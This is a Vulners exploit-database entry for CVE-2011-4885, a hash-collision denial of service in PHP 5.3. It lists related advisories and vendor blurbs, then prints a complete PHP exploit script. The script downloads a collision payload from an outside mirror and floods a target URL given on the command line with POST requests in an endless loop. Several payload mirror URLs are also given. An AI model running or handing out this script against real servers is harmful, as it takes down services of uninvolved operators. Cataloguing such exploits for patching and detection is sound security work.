Vulners
Lucene search
PHP 5.3.8 - Hashtables Denial of Service
| Reporter | Title | Published | Views | Family All 204 |
|---|---|---|---|---|
 | PHP Hashtables Denial of Service | 1 Jan 201200:00 | – | zdt |
| PHP Hash Table Collision Proof Of Concept | 3 Jan 201200:00 | – | zdt |
 | PHP < 5.3.9 Multiple Vulnerabilities | 16 Jan 201200:00 | – | nessus |
| Mac OS X 10.7 < 10.7.4 Multiple Vulnerabilities | 14 May 201200:00 | – | nessus |
| PHP < 5.3.9 Multiple Vulnerabilities | 16 Jan 201200:00 | – | nessus |
| Amazon Linux AMI : php (ALAS-2012-37) | 4 Sep 201300:00 | – | nessus |
| Amazon Linux AMI : php (ALAS-2012-41) | 4 Sep 201300:00 | – | nessus |
| CentOS 5 / 6 : php / php53 (CESA-2012:0019) | 12 Jan 201200:00 | – | nessus |
| CentOS 5 : php (CESA-2012:0033) | 24 Jan 201200:00 | – | nessus |
| CentOS 4 : php (CESA-2012:0071) | 29 Jun 201300:00 | – | nessus |
10
# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service
Exploit
# Date: 1/1/12
# Author: infodox
# Software Link: php.net
#
Version: 5.3.*
# Tested on: Linux
# CVE : CVE-2011-4885
Exploit
Download -- http://infodox.co.cc/Downloads/phpdos.txt
<?php
/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885
Mirrors List:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18296.txt (hashcollide.txt)
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt
Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing
Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
echo "firing";
$ch = curl_init("$targ");
curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
curl_exec($ch);
curl_close($ch);
echo "[+] Voly Sent!";
}
?>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jan 2012 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 25
EPSS0.86573